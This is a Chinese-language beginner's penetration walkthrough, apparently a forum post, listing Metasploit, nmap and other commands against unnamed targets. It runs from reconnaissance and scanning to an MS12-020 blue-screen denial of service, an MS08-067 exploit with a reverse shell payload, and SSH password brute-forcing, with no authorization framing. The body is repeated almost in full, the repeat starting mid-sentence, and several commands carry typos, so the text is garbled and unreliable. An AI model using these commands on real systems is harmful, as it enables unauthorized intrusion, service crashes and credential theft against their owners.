下面是最近的一次简单的渗透攻击具体思路,涉及到2个系统服务攻击,记住一步一步的看,虽然很多人都像我一样对直接入侵电脑感兴趣,但是他的前期是枯燥无味,不过一定要一步一步的看完,因为通往权限的路,很艰难。MS12这个漏洞呢你可以通过msfconsole来进
行渗透,我就说折磨多了,你们自己看吧,虽然不是教程不过很详细,很容易懂。QQ:1099718640不懂得来问我
此教程仅为菜鸟,小白,入门提供,大鸟请飞走。
。。。。。。
攻击前期 信息收集
攻击中 利用漏洞
攻击后 后渗透攻击
网络踩点 ip踩点
whois域名注册信息查询
whois 域名 testfire.net
nslookup与dig域名查询
查询服务器上的cache非权威
终端输入nslookup
进入后set type=A
域名输入
exit退出
dig查询 可以指定具体的服务器查询
dig ip 域名
IP2location地理位置查询
www.maxmind.com 国外
www.cz88.net 国内
www.cnwzml.com 国内
netcraft实现信息查询服务
searchdns.netcraft.com
www.cnwzml.com
ip2Domain反查域名
www.7c.com
www.cnwzml.com
ip-address.com
网络踩点 搜索引擎
谷歌语法
parent directory site:域名
sete:域名 filetype:xls xls为格式
搜索email地址
msf use auxiliary/gather/search_email_collector
扩普路径踩点
traceroute 域名
tcptraceroute 域名
主机扫描 找出活跃主机
ping ip 太简单
ping -c 表示数量
ping -s 表述数据包大小
arping 别躲了 ,必有
arping ip
在arp的基础上加入网段扫描
arp-scan --interface=eth2 这是网卡 ip/24
nbtscan 扫描
nbtscan ip/24
nmap 最强工具,不解释
nmap ip
nmap -sn ip/24 加sn不做端口
nmap ip/24
nmap -sS -Pn ip 能扫描到ip,端口,信息,操作
nmap -sV -Pn ip 比上面更加 详细
nmap -sV ip 能扫描到ip,端口,信息,操作
nmap -A ip 所有信息
msfconsole扫描主机
msfconsole进入
msf use auxiliary/scanner/discovery/arp_sweep 调用主机扫描模块
msf auxiliary(arp_sweep)>show options
msf set options
msf set RHOSTS ip
msf set SMAC 那个网段
msf set INTERFADE eth2
ip-ip
msf set THREADs 10 线程
msf run 执行
系统扫描
xprobe2 ip
nmap -O ip
端口扫描
metaspolit端口扫描
块不容易被发现
msf use auxiliary/scanner/portscan/syn 端口扫描模块
msf set RHOSTS ip
msf set THREADS 20 线程数
run执行
back 退出
Nmap 端口服务系统探测
nmap -sS -Pn ip 能扫描到ip,端口,信息,操作
nmap -sV -Pn ip 比上面更加 详细
nmap -sV ip 能扫描到ip,端口,信息,操作
nmap -A ip 所有信息
漏洞扫描附带渗透攻击全程
MS12-020系统高危漏洞
一般开启3389端口的xp和server 2003都有
DOS开启windows server 2003
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
蓝屏
MS08-067系统高危漏洞的渗透
msf search ms08_067
msf use exploit/windows/smb/ms08_067_netapi 调用ms08渗透攻击模块
msf show payloads 查看载荷
msf set payloads generic/shell_reverse_tcp
msf RHOST ip 设置目标ip
msf set LHOST ip 设置本地ip
msf set LPORT 5000本地端口
msf set target 5 设置目标系统操作代码为5,这里指windows server 2003
msf show options 再次检查渗透攻击参数
msf exploit 执行渗透
拿到shell 成功渗透
后面是后渗透攻击小部分
Telnet网络查点
用户账户名:口令猜测破解
错误配置的共享资源 恶意程序上传
老旧版本的网络服务版本 缓冲区于出漏洞攻击
nmap -sV ip
msf use auxiliary/scanner/telnet/telnet_version 调用模块
msf set RHOSTS ip/24
msf set THREADS 100 设置线程
msf run
telnet ip
SSH口令破解
msf use auxiliary/scanner/ssh/ssh_login 调用模块
msf set RHOSTS ip
msf set USERNAME root 账户
msf set PASS_FILE/root/wonds.txt 设置目录
msf set THPEADS 50 设置线程
msf run
Nessus
就是折磨简单,不过这只是渗透的一部分,由于本人技术原因,也就只能写到这了,后渗透攻击,和一些其他的渗透系统攻击之类的本人还并不会,
行渗透,我就说折磨多了,你们自己看吧,虽然不是教程不过很详细,很容易懂。QQ:1099718640不懂得来问我
此教程仅为菜鸟,小白,入门提供,大鸟请飞走。
。。。。。。
攻击前期 信息收集
攻击中 利用漏洞
攻击后 后渗透攻击
网络踩点 ip踩点
whois域名注册信息查询
whois 域名 testfire.net
nslookup与dig域名查询
查询服务器上的cache非权威
终端输入nslookup
进入后set type=A
域名输入
exit退出
dig查询 可以指定具体的服务器查询
dig ip 域名
IP2location地理位置查询
www.maxmind.com 国外
www.cz88.net 国内
www.cnwzml.com 国内
netcraft实现信息查询服务
searchdns.netcraft.com
www.cnwzml.com
ip2Domain反查域名
www.7c.com
www.cnwzml.com
ip-address.com
网络踩点 搜索引擎
谷歌语法
parent directory site:域名
sete:域名 filetype:xls xls为格式
搜索email地址
msf use auxiliary/gather/search_email_collector
扩普路径踩点
traceroute 域名
tcptraceroute 域名
主机扫描 找出活跃主机
ping ip 太简单
ping -c 表示数量
ping -s 表述数据包大小
arping 别躲了 ,必有
arping ip
在arp的基础上加入网段扫描
arp-scan --interface=eth2 这是网卡 ip/24
nbtscan 扫描
nbtscan ip/24
nmap 最强工具,不解释
nmap ip
nmap -sn ip/24 加sn不做端口
nmap ip/24
nmap -sS -Pn ip 能扫描到ip,端口,信息,操作
nmap -sV -Pn ip 比上面更加 详细
nmap -sV ip 能扫描到ip,端口,信息,操作
nmap -A ip 所有信息
msfconsole扫描主机
msfconsole进入
msf use auxiliary/scanner/discovery/arp_sweep 调用主机扫描模块
msf auxiliary(arp_sweep)>show options
msf set options
msf set RHOSTS ip
msf set SMAC 那个网段
msf set INTERFADE eth2
ip-ip
msf set THREADs 10 线程
msf run 执行
系统扫描
xprobe2 ip
nmap -O ip
端口扫描
metaspolit端口扫描
块不容易被发现
msf use auxiliary/scanner/portscan/syn 端口扫描模块
msf set RHOSTS ip
msf set THREADS 20 线程数
run执行
back 退出
Nmap 端口服务系统探测
nmap -sS -Pn ip 能扫描到ip,端口,信息,操作
nmap -sV -Pn ip 比上面更加 详细
nmap -sV ip 能扫描到ip,端口,信息,操作
nmap -A ip 所有信息
漏洞扫描附带渗透攻击全程
MS12-020系统高危漏洞
一般开启3389端口的xp和server 2003都有
DOS开启windows server 2003
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
蓝屏
MS08-067系统高危漏洞的渗透
msf search ms08_067
msf use exploit/windows/smb/ms08_067_netapi 调用ms08渗透攻击模块
msf show payloads 查看载荷
msf set payloads generic/shell_reverse_tcp
msf RHOST ip 设置目标ip
msf set LHOST ip 设置本地ip
msf set LPORT 5000本地端口
msf set target 5 设置目标系统操作代码为5,这里指windows server 2003
msf show options 再次检查渗透攻击参数
msf exploit 执行渗透
拿到shell 成功渗透
后面是后渗透攻击小部分
Telnet网络查点
用户账户名:口令猜测破解
错误配置的共享资源 恶意程序上传
老旧版本的网络服务版本 缓冲区于出漏洞攻击
nmap -sV ip
msf use auxiliary/scanner/telnet/telnet_version 调用模块
msf set RHOSTS ip/24
msf set THREADS 100 设置线程
msf run
telnet ip
SSH口令破解
msf use auxiliary/scanner/ssh/ssh_login 调用模块
msf set RHOSTS ip
msf set USERNAME root 账户
msf set PASS_FILE/root/wonds.txt 设置目录
msf set THPEADS 50 设置线程
msf run
Nessus
就是折磨简单,不过这只是渗透的一部分,由于本人技术原因,也就只能写到这了,后渗透攻击,和一些其他的渗透系统攻击之类的本人还并不会,